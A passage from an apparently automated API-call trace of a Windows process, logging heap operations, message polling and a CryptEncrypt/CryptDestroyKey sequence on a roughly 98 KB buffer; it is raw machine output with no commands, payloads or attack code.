hHeap=0x8a0000) returned 1 [0198.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0198.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0198.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0198.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0198.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0198.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0198.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0198.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0198.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0198.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0198.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0198.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0198.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0198.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0198.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0198.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0198.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0198.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0198.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0198.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0198.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0198.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0198.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0198.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0198.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0198.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0198.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0198.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0198.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0198.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0198.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0198.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0198.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0198.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0198.823] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0198.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0198.823] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c28a8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c28a8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0198.823] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.823] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.823] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.823] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.823] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.823] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.823] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.823] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.824] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0198.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0198.824] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.824] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0198.824] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0198.824] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.824] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.824] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0198.824] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.824] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0198.824] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0198.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.824] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0198.825] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.825] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.825] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x1811c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x18120) returned 1 [0198.825] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.825] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0198.825] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.825] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.825] CharLowerBuffW (in: lpsz="byte[98593]", cchLength=0xb | out: lpsz="byte[98593]") returned 0xb [0198.825] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.827] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.827] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.827] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.829] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.829] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa8f258*, pdwDataLen=0x87e820*=0x1811c, dwBufLen=0x18120 | out: pbData=0xa8f258*, pdwDataLen=0x87e820*=0x18120) returned 1 [0198.832] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.832] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0198.832] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.834] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0198.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.835] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.835] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.835] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.835] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0198.835] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.835] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.835] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0198.835] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.835] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0198.835] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.843] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.843] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.843] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.849] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.849] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.849] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0198.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.850] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.850] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.850] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0198.850] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.850] CryptDestroyKey (hKey=0x90aed8) returned 1 [0198.850] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.850] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.850] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0198.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0198.850] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0198.850] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0198.851] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0198.851] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0198.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0198.851] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0198.851] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.851] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0198.851] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0198.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0198.851] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0198.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0198.851] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.851] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.851] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.851] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0198.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.851] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.851] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.851] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.851] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0198.852] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.852] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 